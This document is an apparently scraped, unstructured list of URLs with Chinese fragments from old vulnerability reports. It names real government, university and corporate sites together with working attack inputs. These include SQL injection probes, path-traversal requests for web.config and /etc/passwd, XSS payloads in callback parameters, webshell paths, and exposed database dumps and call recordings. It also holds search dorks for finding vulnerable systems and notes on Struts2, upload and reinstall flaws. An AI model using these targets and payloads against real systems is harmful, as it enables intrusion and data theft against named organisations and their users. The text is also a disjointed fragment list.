http://www.nipcip.com/login.jsp http://www.shilongqu.gov.cn/222.jsp http://www.wuzhi.gov.cn/4444.jsp?o=vLogin http://xshxy.gxun.edu.cn/zhao/info/class.asp?id=4 http://xyh.cdu.edu.cn/schnewslist.php?id=2 http://tw.lnist.edu.cn/column.asp?id=1 http://jdqw.jiading.gov.cn http://oa.china-sss.com/defaultroot/public/edit/admin/main.jsp http://www.lib.whu.edu.cn/news/view.asp?id=2599%20and%201=1 www.shunliu.com http://drops.wooyun.org/papers/548 http://www.gntime.com/do/login.php注册一个会员。但是级别很低,足够了 http://www.intersk.com/】,是一家致力于品牌网站建设,优化推广,400电话,企业邮箱、网站应用程序开发(B/S)等互联网领先服务商。简单的来说该公司开发的一套系统虽然没有什么名字这里就以“深圳互联系统”来命名,该系统主要用于深圳市各大企业公司网站的建设,该系统存在注射漏洞和未授权的任意文件上次漏洞,可能造成极大的危害,如何识别为深圳互联系统,我们看看后台的风格: http://scm.ankai.com/login/Login.action http://scm.ankai.com/cmd.jsp?o=vLogin http://crm.haotehui.com/ http://www.9sky.com/12530/searchring.aspx?artNa http://sqlmap.org http://www.9sky.com:80/12530/default.aspx http://www.sosocha.com/data.zip http://ls.laohu.com/db/main/filter?filter=cardtype%3D3 http://sqlmap.org http://v.anhuinews.com/includes/fckeditor/editor/filemanager/upload/test.html http://v.anhuinews.com/images/stories/blog/image/template.php http://v.anhuinews.com/scan.php?action=scan http://www.midifan.com/ http://oa.epoint.com.cn/CustomerFront/FAQSystem.aspx?CategoryGuid= http://www.jyeoo.com/ http://e.easou.com/searchPro_agentArea_sqdl.html#pro_content发现的搜索 www.ereachmobile.com http://www.bjgzw.gov.cn/QtCommonAction.do?method=xxcx&type=0000004010 http://www.zhifangzi.com:28017/数据库泄露,具有读写权限。 http://vip.400cti.com.cn/登录页面管理员的密码.请问这个有用吗 http://119.7.**.***:9090/monitor/ http://119.7.**.***:9090/monitor/%5b2014-7-08%5d/015121045028-018182323298-1404765410.8436-043650.wav http://119.7.**.***:9090/monitor/[2014-7-07]/015121045028-015595397889-1404745379.8285-230259.wav http://fancyguo.com/ inurl:https https://124.238.218.84/web.zip http://i.178.com/~game.newgame.add_wl http://e.zj165.com/download.html www.xj.cn也有此问题,可能getshell,没继续试。 www.alexa.cn 
http://211.152.100.148/voices/download/211.152.100.148/867500000/luyin/ http://www.hrbgs.gov.cn/lck.txt http://www.eyukj.com/admin.php http://www.sibide.com/admin.php http://www.comcat.cn/admin.php http://www.sdymz.net/admin.php http://www.tjconnected.com/admin.php http://www.chinaqhd.cn http://cugnc.cug.edu.cn/cms/index.do http://www.et.zjut.edu.cn/admincp/ http://www.et.zjut.edu.cn/content/?sid=2 http://bd.generali-china.cn/jmx-console/ http://ideaclub.lenovo.com.cn/forum/home.php?mod=space&uid=656358&do=profile www.3lengjing.com) http://211.151.36.39/ http://211.151.36.37/ http://211.151.36.33/ http://qdzyfw.qingdao.gov.cn/Pages/RecruitInfo/View.aspx?Guid=1403b2e2-ac8e-41cd-a4d4-853e968aae41”存在一枚SQL注入漏洞,利用该漏洞可以获取系统权限。更重要的是青岛志愿网同C段下存在大量青岛政府网站,利用该漏洞拿到系统权限后,可以发起中间人攻击,对其他政府站点进行网页篡改、挂马、嗅探。 http://www.jiukuaiyou.com/ http://sbc.xzit.edu.cn/hxjc/DownLoad.aspx?Accessory=../web.config http://hedds.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://www.emcjs.org/DownLoad.aspx?Accessory=../web.config http://labyuanlin.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://artlab.njfu.edu.cn/DownLoad.aspx?Accessory=../web.config http://xygq.njutcm.edu.cn/DownLoad.aspx?Accessory=../web.config http://bbs.kuwo.cn/forum/data/backup_140306_G3P1Gy/ inurl:funonews.ASP?ID= http://www.zg.gov.cn/photo/pic_show.aspx?pid=311 http://www.bxxy.com/sonsite/2011pingjian/pj/upload/help/js/..../a.asp http://leboapi.baidu.com/lebo/selectlink?type=getSongFileLinkWithAdv&linktype=2&songids=6281502%20%20and%201=1%23 http://leboapi.baidu.com/lebo/selectlink?type=getSongFileLinkWithAdv&linktype=2&songids=6281502%20%20and%201=2%23 www.ikuai8.com http://dev.snail.com/Site/Login.html http://ting.kekenet.com/tx/270439 http://write.kekenet.com/show_55# inurl:GZZDInfordetail.jsp?id inurl:FLGDInfordetail.jsp?id inurl:gkznInfo.jsp?depcode inurl:orgsiteInfo.jsp?orgid inurl:js_NDBGInfordetail.jsp?id http://www.tjzfxxgk.gov.cn/tjep/GZZDInfordetail.jsp?id=43 
http://info.tjjn.gov.cn/GZZDInfordetail.jsp?id=17 http://xinxigk.baodi.gov.cn/GZZDInfordetail.jsp?id=10 http://gk.tjjh.gov.cn/GZZDInfordetail.jsp?id=11 http://xxgk.tjbc.cn/GZZDInfordetail.jsp?id=5 http://www.tjnh.gov.cn:7002/GZZDInfordetail.jsp?id=7 http://202.99.99.30/GZZDInfordetail.jsp?id=10 http://gk.tjhqqzf.gov.cn/GZZDInfordetail.jsp?id=5 http://zfxxgk.bh.gov.cn/GZZDInfordetail.jsp?id=9 http://221.239.20.83/GZZDInfordetail.jsp?id=9 http://218.69.96.137/GZZDInfordetail.jsp?id=2 http://gk.tjheping.gov.cn:3030/GZZDInfordetail.jsp?id=14 http://www.tjzfxxgk.gov.cn/tjep/FLGDInfordetail.jsp?id=43 http://zwgk.tjhd.gov.cn:8000/FLGDInfordetail.jsp?id=11 http://info.tjjn.gov.cn/FLGDInfordetail.jsp?id=28 http://gk.tjjh.gov.cn/FLGDInfordetail.jsp?id=29 http://www.tjnh.gov.cn:7002/FLGDInfordetail.jsp?id=14 http://gk.tjhqqzf.gov.cn/FLGDInfordetail.jsp?id=5 http://202.99.99.30/FLGDInfordetail.jsp?id=11 http://zfxxgk.bh.gov.cn/FLGDInfordetail.jsp?id=10 http://221.239.20.83/FLGDInfordetail.jsp?id=2 http://zwgk.tjhexi.gov.cn:8080/FLGDInfordetail.jsp?id=1 http://gk.tjheping.gov.cn:3030/FLGDInfordetail.jsp?id=11 http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15M http://info.tjjn.gov.cn/gkznInfo.jsp?depcode=BOF04A http://gk.tjnk.gov.cn/gkznInfo.jsp?depcode=BDA20B http://xinxigk.baodi.gov.cn/gkznInfo.jsp?depcode=BNA05F http://gk.tjjh.gov.cn/gkznInfo.jsp?depcode=BRA19G http://gk.xq.gov.cn/gkznInfo.jsp?depcode=BJE01A http://www.tjnh.gov.cn:7002/gkznInfo.jsp?depcode=BQA07K http://xxgk.tjbc.cn/gkznInfo.jsp?depcode=BLA25I http://zwgk.tjhexi.gov.cn:8080/gkznInfo.jsp?depcode=BCE01A http://gk.tjhqqzf.gov.cn/gkznInfo.jsp?depcode=BFA02B http://202.99.99.30/gkznInfo.jsp?depcode=CBA10E http://60.28.129.212/gkznInfo.jsp?depcode=BE0000 http://61.181.146.98:7002/gkznInfo.jsp?depcode=BQA20L http://218.69.106.201:8080/gkznInfo.jsp?depcode=BCA28A http://221.239.20.83/gkznInfo.jsp?depcode=BKB23E http://gk.tjwq.gov.cn/gkznInfo.jsp?depcode=BMF25A http://218.69.96.137/gkznInfo.jsp?depcode=BMB04C 
http://60.30.65.156/gkznInfo.jsp?depcode=BNB05L http://gk.tjheping.gov.cn:3030/gkznInfo.jsp?depcode=BAE02A http://www.tjzfxxgk.gov.cn/tjep/orgsiteInfo.jsp?orgid=91 http://xxgk.tjbc.cn/orgsiteInfo.jsp?orgid=102 http://info.tjjn.gov.cn/js_NDBGInfordetail.jsp?id=5 http://zwgk.tjhd.gov.cn:8000/js_NDBGInfordetail.jsp?id=4 http://gk.xq.gov.cn/js_NDBGInfordetail.jsp?id=2 http://xinxigk.baodi.gov.cn/js_NDBGInfordetail.jsp?id=7 http://gk.tjjh.gov.cn/js_NDBGInfordetail.jsp?id=6 http://www.tjzfxxgk.gov.cn/tjep/js_NDBGInfordetail.jsp?id=5 http://www.tjnh.gov.cn:7002/js_NDBGInfordetail.jsp?id=13 http://xxgk.tjbc.cn/js_NDBGInfordetail.jsp?id=8 http://gk.tjhqqzf.gov.cn/js_NDBGInfordetail.jsp?id=4 http://gk.tjnk.gov.cn/js_NDBGInfordetail.jsp?id=5 http://zwgk.tjhexi.gov.cn:8080/js_NDBGInfordetail.jsp?id=2 http://202.99.99.30/js_NDBGInfordetail.jsp?id=2 http://zfxxgk.bh.gov.cn/js_NDBGInfordetail.jsp?id=4 http://221.239.20.83/js_NDBGInfordetail.jsp?id=6 http://www.yododo.com/ http://dkp.178.com/ http://dkp.178.com/?game_id=0&area=%E4%B8%80%E5%8C%BA&server=%E9%98%BF%E6%A0%BC%E6%8B%89%E7%8E%9B&gid=1&guild=niubi&_app=dkp&_controller=search&_action=search http://v.baidu.com/commonapi/topic/?topicid=11 http://v.baidu.com/commonapi/topic/?topicid=11 http://crazyenglish.com/ http://www.wangdaizhibao.com http://ccav.com/LC3Aro?1405559322 www.jzjjjc.gov.cn http://www.jzjjjc.gov.cn/hdjl/forum.php http://www.jzjjjc.gov.cn/phpinfo.php http://112.65.221.82/ http://www.ziroom.com/?_p=sign&_a=weakpassowrd&step=1&type=forgetpassword http://www.ziroom.com/index.php?_p=api&_a=customer&type=search&login_name=188xxxxxxxx http://pay.anzhi.com/web/recharge http://218.241.83.21/zhihui/ http://netpay.uestc.edu.cn/ http://netpay.uestc.edu.cn/LoginAction.action{struts2漏洞} http://shurufa.baidu.com/?act=dict.checkname http://ioa.rising.com.cn/ http://sports.chosun.com/cartoon/content.htm?title=ghost http://economyplus.chosun.com/special/special_view_star.php?atCode=2300 www.chinafpn.com www.youxiandai.net 
www.youxiandai.cn www.youxiandai.com.cn http://www.chinafpn.com:80/web/productlist.action http://www.youxiandai.cn/web/poffertbiamountNew.action http://www.chinafpn.com/uploads/contracts/20140030007.pdf http://www.chinafpn.com/uploads/contracts/2014004B0006.pdf http://flashcms.10jqka.com.cn/default/login/ http://me.hbjt.gov.cn/fb/config.js www.sph.com.cn/Office/OfficeA.aspx?catid=4&D=&outID=47和www.sph.com.cn/Person/PersonTD.aspx?CID=1 http://dealer.auto.sohu.com/auth/login.action http://dealer.auto.sohu.com/reg/go_to_register.at http://dealer.auto.sohu.com/bat69210/index.html http://oa.mendale.com:89/m1/login.do https://www.google.com.hk/search?q=allintext:+Company+Logo+%E5%B8%90%E5%8F%B7+%E5%AF%86%E7%A0%81+%E8%AF%AD%E8%A8%80+%E4%B8%AD%E6%96%87+%E8%8B%B1%E6%96%87+%E5%AD%97%E4%BD%93+%E5%A4%A7+%E4%B8%AD+%E5%B0%8F+%E8%AE%B0%E4%BD%8F%E5%AF%86%E7%A0%81+Company+Logo+%E5%B8%90%E5%8F%B7+%E5%AF%86%E7%A0%81+%E8%AF%AD%E8%A8%80+%E4%B8%AD%E6%96%87+%E8%8B%B1%E6%96%87+%E5%AD%97%E4%BD%93+%E5%A4%A7+%E4%B8%AD+%E5%B0%8F+%E8%AE%B0%E4%BD%8F%E5%AF%86%E7%A0%81&lr=&safe=strict&as_qdr=all&ei=pvHHU7uWFMPn8AWW-oGAAw&start=0&sa=N&filter=0&biw=1366&bih=611 http://www.lntymj.com:8080/m1/login.do http://218.3.160.242:8080/m1/login.do http://218.3.160.242:8080/m1/login.do http://www.lntymj.com:8080/m1/login.do http://oa.cccgroup.com.cn:88/m1/login.do http://m.liando.cn/m1/login.do http://119.60.10.146:89/ http://www.henly.com.cn:89/m1/login.do http://59.55.142.211:8091/m1/login.do http://121.28.82.250:89/login.do http://60.208.78.250:801/m1/login.do com:89/m1/login.do com:89/m1/login.do portal.lanju.cn/m1/login.do http://m.isimcere.com/m1/login.do http://218.3.160.242:8080/m1/login.do http://www.simcere.net/m1/login.do http://ad.easou.com/admin/toLogin.admin http://pvlog.moviebox.baofeng.com/phpinfo.php http://www.scdrc.gov.cn/system.htm这个里面的这些管理系统某些存在struts2远程执行漏洞 http://118.122.113.71:8780/login.do http://118.122.113.83:8380/shsy/login.do http://118.122.113.76:8180/jnjp/login.do 
http://www.ebdoor.com/ http://huizhou.ganji.com/fuwu_dian/2658801/liangyoulei/ http://m.okgj.com/ http://42.96.185.111:8090/worldcup/ http://v.ku6.com/tiand1 www.web029.com.cn http://oa.zoomla.cn/ http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://oa.zoomla.cn/Messagemanage/View_MessageManage.aspx?id=1 http://demo.zoomla.cn http://demo.zoomla.cn/admin/login.aspx http://demo.zoomla.cn/Admin/I/Template/TemplateEdit.aspx?setTemplate=%2fTemplate%2fV3&filepath=../../../config/AppSettings.config http://demo.zoomla.cn/install即可重装(测试成功) http://demo.zoomla.cn/Admin/I/Template/TemplateManage.aspx?setTemplate=%2f&Dir= http://demo.zoomla.cn/Admin/I/Template/TemplateEdit.aspx?setTemplate=%2fTemplate%2fV3&filepath=../../../config/ConnectionStrings.config http://183.61.119.56/index.php inurl:zsdt_cont.asp?id= https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#btnK=Google+%E6%90%9C%E7%B4%A2&hl=zh-CN&newwindow=1&q=inurl:zsdt_cont.asp%3Fid%3D&safe=strict http://7.114ok.cc/%E4%BA%AC%E7%91%9E%E6%81%A9%E8%AF%AD%E8%A8%80%E5%9F%B9%E8%AE%AD%E7%BD%91%E6%BA%90%E7%A0%81/zsdt_cont.asp?id=267 http://www.scfabang.com/zsdt_cont.asp?id=316 http://www.xmyinyue.com/zsdt_cont.asp?id=452 http://www.swjtu-edu.cn/zsdt_cont.asp?id=363 http://www.huitongxx.com/kjyypx/zsdt_cont.asp?id=289 http://qy.qidox.cn/zsdt_cont.asp?id=1140 http://www.chinaface.com/user/forget?step=reset&key=xxxxxx http://www.dt.gov.cn:8080/search.php http://sqlmap.org inurl:newsinfo.asp?id= https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E5%85%84%E5%BC%9F%E7%BD%91%E7%BB%9C+inurl:newsinfo.asp%3Fid%3D&safe=strict http://www.xardsoft.com/newsinfo.asp?id=34 http://www.c-wst.com/newsinfo.asp?id=547 http://www.kondarlfeed.com/newsinfo.asp?id=630 http://www.wnsdeyy.com/newsinfo.asp?id=170 http://jy.sxri.net/newsinfo.asp?id=509 
http://www.henryfloor.com/newsinfo.asp?id=17 http://www.asiatravelsa.com/newsinfo.asp?id=562 http://www.liyutian.com/newsinfo.asp?id=479 http://www.fmvcc.com/newsinfo.asp?id=45&sjid= http://www.bio-zt.com/newsinfo.asp?id=172 http://www.xajjzh.com/newsinfo.asp?id=397 http://www.gzswjst.com/DataBase/DB.mdb http://www.gzswjst.com/Login.Asp http://www.gzswjst.com/admin/login.asp http://www.gzswjst.com/GuestBook/ http://www.gzswjst.com/pass.asp http://bbs.chosun.com/bbs.message.view.screen?bbs_id=201 http://www.baidu.com/s?tn=monline_5_dg&f=8&wd=%E6%95%99%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%BC%BA%E6%99%BA%E7%A7%91%E6%8A%80%20%E7%89%88%E6%9D%83&ie=utf-8&oq=%E6%95%99%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%BC%BA%E6%99%BA%E7%A7%91%E6%8A%80%20%E7%89%88%E6%9D%83&bs=%E6%95%99%E5%8A%A1%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81&rsv_bp=1&inputT=19786&rsv_sug3=61&rsv_sug4=15884&rsv_sug1=43&rsv_sug2=0&pn=10 http://jwgl.cqeec.com/jiaowu_2008/ http://114.255.66.248/jiaowu/ http://121.28.180.234/jiaowu/ http://219.148.49.53/jiaowu/ http://jiaowu.hustwenhua.net/ http://211.81.25.6/jiaowu/ http://218.204.113.170/jiaowu/ http://221.2.229.222/jiaowu/ http://59.173.249.245/wljiaowu/ inurl:product.asp?id= https://www.google.com.hk/webhp?hl=zh-CN&sourceid=cnhp#hl=zh-CN&newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E7%BB%B4%E8%81%94%E7%A7%91%E6%8A%80+inurl:product.asp%3Fid%3D&safe=strict http://www.conplastech.com/product.asp?pid=3 http://www.dyjzj.com/product.asp?id=710 http://www.odsm.cn/product.asp?id=635 http://www.mekolift.com/product.asp?id=907 http://www.sutaiqiye.com/product.asp?id=470 http://www.kxjx.com.cn/product.asp?id=622 http://www.jlzq.com/product.asp?id=3 http://www.fenghuajx.com/product.asp?id=461 http://www.wjjnzp.com/product.asp?id=554 http://www.wjqxbs.com/product.asp?id=480 http://www.wanlong-china.com/product.asp?id=12 http://www.klesjj.com/product.asp?id=33 http://szyhdr.com/product.asp?id=74 
http://www.youte.cn/product.asp?id=35 http://www.kainuote.com/product.asp?id=24 http://www.ks-km.com/product.asp?id=16 http://www.chinacreator.com/】开发的系统专用于湖南省各个政府机构使用,其中某个投票处存在SQL注射漏洞,可获取任意数据。 http://security.ctocio.com.cn/145/12469145.shtml这个就是了 http://odo.jd.com/payment/paid.action?callback=jsonp%3Cimg%20src=1%20onerror=alert%281%29%3E&_=1405693358313&json=382637832a&r=0.19931061877079614 http://jr.jd.com/async/trade/info?callback=j%3Cimg%20src=1%20onerror=alert%28%27xss%27%29%3E&_=1405691146386 http://hoau.sungodo.cn/global_Login.do;jsessionid=3CFD809A639B513D5D4E9591EDEFCDEB http://eps.usas.com:208/global_Login.do;jsessionid=FECE4411D6757B6C11681E52AB7A8265 http://www.crpcecg.com:8070/global_Login.do;jsessionid=52744BF9F2B100FAE65ADBC7588E43DE http://korrun.cn/global_Login.do;jsessionid=CF7CD72EC7AB179108C0CAFF3701EB8C http://www.szztej.com/global_Login.do;jsessionid=43CD594D60D010FE8C80251A9A63A0FC http://bid.lyxztb.gov.cn:8080/global_Login.do;jsessionid=DBE91362886979C6FE620CD70D906C74 http://www.sh5mcc.net/global_Login.do http://caigou.mitgroup.com.cn:808/global_Login.do http://bid.lyxztb.gov.cn:8080/global_Login.do http://hoau.sungodo.cn/global_Login.do http://www.hh010.com/safe/html/33-1/1470.htm这就是漏洞了 inurl:NewsView.asp?ID= http://www.bbjyt.net/) http://122.224.169.190:10080/JSSMS/ http://202.108.199.10/ http://mail.nmefc.gov.cn: inurl:/News.shtml?ide= http://txjy.dg.gov.cn/adminroot/login.htm http://txjy.dg.gov.cn/adminroot/common/downLoadFile.jsp?filepath=adminroot/default.jsp&filename=None http://txjy.dg.gov.cn/adminroot/common/downLoadFile.jsp?filepath=/WEB-INF/web.xml&filename=None http://www.xxx.com/news.asp?id=100 http://www.ltall.net/ http://uswebmail.mail.126.com/appcenter/ftentry.do?sid=XXXXXXXXXXX&func=mapp:sequential典型的XXE注入,POST参数var http://www.snciq.gov.cn:6198/car/common/file8.jsp http://221.176.1.140:8080/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd 
http://211.137.34.226/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd http://zabbix.uzai.com/ www.msdlr.gov.cn)存在XSS漏洞!弱口令!等多处漏洞! http://www.msdlr.gov.cn/user/User_Login.asp http://www.dapu.com/passport-lost-2-EA5D9AF19D0101D010C9386569577D48.html https://vpn.ruc.edu.cn https://vpn.ruc.edu.cn/,DanaInfo=www.cnki.net+ https://vpn.ruc.edu.cn/,DanaInfo=www.lib.ruc.edu.cn,SSO=U+ https://vpn.ruc.edu.cn/,DanaInfo=portal.ruc.edu.cn,SSO=U+ https://vpn.ruc.edu.cn/portal/media-type/html/user/admin/page/default.psml/js_pane/,DanaInfo=portal.ruc.edu.cn+P-11b54ab9353-1001a http://i.4399.cn/mobile/100434.html http://219.135.157.130/HomePageOut/index.jsp inurl:/article.php?action=show&id= http://www.hnmz.gov.cn/new/cms/article.php?action=show&id=1195 http://www.pjwsj.gov.cn/cms/article.php?action=show&id=76 http://www.hnxq.gov.cn/new/cms/article.php?action=show&id=387 http://www.cjpmp.com/cms/article.php?action=show&id=2432 http://www.hn5z.com/cms/article.php?action=show&id=778 http://www.hnmz.gov.cn/new/cms/ http://www.pjwsj.gov.cn/cms/ http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E7%A7%91%E8%81%94%E7%BD%91%E7%BB%9C inurl:show.asp?D_id= http://209.116.186.246/#newwindow=1&q=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81:%E6%B0%B8%E4%BF%A1%E7%BD%91%E7%BB%9C+inurl:show.asp%3FD_id%3D&start=20 http://www.sy9z.cn/other/show.asp?D_id=1062 http://sjc.sau.edu.cn/cwsj/show.asp?D_id=507 http://lnjxdc.com/news/show.asp?D_id=323 http://www.syhmc.net/s_show.asp?D_id=548 http://www.sykepu.com/news/news_show.asp?D_id=562 http://ayhqd.com/news_show.asp?D_id=936 http://www.meiycolor.com/news_show.asp?D_id=393 http://www.fygyp.cn/p_show.asp?D_id=3584 http://www.sytbd.com/product/show.asp?D_id=1211&d_cataid=A00910001 http://ccjjj.com/cases.aspx http://wooyun.org/bugs/wooyun-2014-058913 http://my.ikang.com/memberService/view/findExamRecordDetail?examid=12279725 
http://my.ikang.com/memberService/view/findExamRecordDetail?examid=12279726 http://bbs.jd.com/ http://xiaoyou.ytu.edu.cn/article.php?type=news&id=118 http://www.ciwong.com/ http://www.jxrcw.com/gposinfo/freejobs/dwinfo.asp?dwrid=23e98a82fb9b35bacb7d1b2339bbb45b http://www.spta.cn/index.do www.spta.cn http://www.spta.cn http://211.162.69.49:8080/projects http://clicklog.moviebox.baofeng.com/phpinfo.php http://222.173.25.11/phpinfo.php http://服务器IP:8833/Report/clientsnapshot.aspx?disableHome=1&clientid= http://211.162.69.227:8081/loginAction_loginInit.action http://211.162.69.227:8081/loginAction!login.action http://graduate.ynnu.edu.cn/web_admin/index.aspx http://graduate.ynnu.edu.cn/uploads/down/cmd.asp http://rj.baidu.com/soft/detail/26608.html?ald http://www.wandoujia.com/apps/com.lenovo.videotalk.phone http://m.app.so.com/detail/index?pname=com.lenovo.videotalk.phone&id=811254 http://d.91.com/Soft/Android/com.polypoly-11.html www.chinapanda.org.cn/blog.php?id=1267 http://qzlx.nbsj.gov.cn/i_detail.asp?id=99&channel_id=1 http://oa.dld.com/ http://oa.dld.com/general/vmeet/wbUpload.php?fileName=test.php+ http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 inurl:TeacherSource.aspx?tid inurl:TeacherBlog.aspx?tid inurl:TeacherAlbums_New.aspx?tid inurl:TeacherBlogDetail.aspx?tid= inurl:TeacherArticle.aspx?KindID inurl:SchoolWeb/Web/TeacherSource.aspx?KindID inurl:AnnounAndNews.aspx?sid http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3340010029 http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3300010009 http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3050010054 http://www.azyry.com/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3160010089 
http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=3180010060 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=3180010065 http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=1000070004 http://www.ohedu.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=1050030116 http://www.gxqx.cn/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=3150010004 http://www.azyry.com/dpma/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=3160010032 http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3050010032 http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3340010026 http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3300010009 http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=3180010065 http://www.ohedu.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherAlbums_New.aspx?tid=1050290019 http://www.gxqx.cn/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=3150010008&diaryId=2122 http://221.224.56.74/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=1030030030&diaryId=1082 http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=3340010034&diaryId=1000 http://www.h1906.net/dpma/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=3210010002&diaryId=4012 http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=1000160027&diaryId=33341 http://www.ohedu.cn/dpma/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1008_1001_1338&sid=105020 http://www.azxx.net/dpma/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1007_1001_1017&sid=305001 http://www.azyry.com/dpma/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1000_1000_1002&sid=316001 http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1007_1001_1005&sid=100004 http://www.h1906.net/DPMA/FWeb/SchoolWeb/Web/TeacherArticle.aspx?KindID=1007_1001_1005&sid=100004 
http://www.gxqx.cn/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1007_1001_1000&User_Type=1&sid=315001 http://www.wxgxzx.net/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1001_1000_1001&sid=303001 http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1006_1001_1643&sid=100050 http://www.whwzyx.net/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1004_1001_1000&sid=318001 http://www.azyry.com/dpma/FWeb/SchoolWeb/Web/TeacherSource.aspx?KindID=1001_1000_1009&sid=316001 http://www.fstc.pdedu.sh.cn/dpma/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=1&sid=330001 http://58.215.245.154/DPMA/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=2&sid=315001 http://szxy.ncjy.net/DPMA/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=2&sid=100034 http://www.azxx.net/dpma/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=1&sid=305001 http://www.ohedu.cn/dpma/FWeb/SchoolWeb/Web/AnnounAndNews.aspx?Type_Anews=1&sid=105020 http://home.focus.cn/zxrj/note_edit.php?action=edit&this_login_id=46028393¬e_id=369216 http://mpa.qdu.edu.cn/cn/Detail.aspx?id=345 http://ibc.qdu.edu.cn/showfeed/?classid=1 http://www.zj.10086.cn/zjydsns.zip http://mp.midea.com.cn/bsnems/engine_Engine_downEngine.do http://developer.baidu.com/rest/2.0/dev/v1/app/base/list2?callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time&sort=asc,注入点&access_token=TOKEN&_=1404913266225 http://XXXX http://www.hr135.com/friend http://www.hr135.com/ask/index.php http://61.185.27.29:8080/ http://oa.dld.com/general/vmeet/wbUpload.php?fileName=test.php+ http://jyzd.xhu.edu.cn/more.asp?id=23 http://jyzd.xhu.edu.cn/news.asp?id=10822 http://jy.xhu.edu.cn/NEWS.asp?id=7337 http://www.baidu.com/s?tn=sitehao123&ie=utf-8&wd=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E6%B5%B7%E6%9E%81%E7%BD%91%E7%BB%9C&oq=%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%3A%E6%B5%B7%E6%9E%81%E7%BD%91%E7%BB%9C&f=8&pn=20&rsv_page=1 http://www.gzzhineng.com/news_detail.asp?id=1624 
http://www.photonbroadband.com.cn/News_detail.asp?id=66 http://www.xpcatv.com/newsdetail.asp?id=64 http://www.e-gtl.com/News_detail.asp?id=33 http://www.langxingdz.com/News_detail.asp?id=17 http://www.ipvod.cn/News_detail.asp?id=48 http://www.weibang360.com/newsdetail.asp?id=125 http://www.zdytl.com/product_detail.asp?id=64 http://www.gzfreeworld.com/messagedetail.asp?id=78 http://www.minmetals-gz.com/News/news_detail.asp?id=2141 http://www.bojess.com/news_detail.asp?id=11 http://www.fshs.com.cn/News_detail.asp?id=16 http://www.gzmeijia.com.cn/product_detail.asp?id=4243 http://www.reod.zju.edu.cn/product_show.asp?id=7480 http://git.oschina.com/ http://club.xywy.com/static/20130625/23731063.htm http://www.xnsj.gov.cn http://www.xnzgh.org http://www.hsxmsy.cn 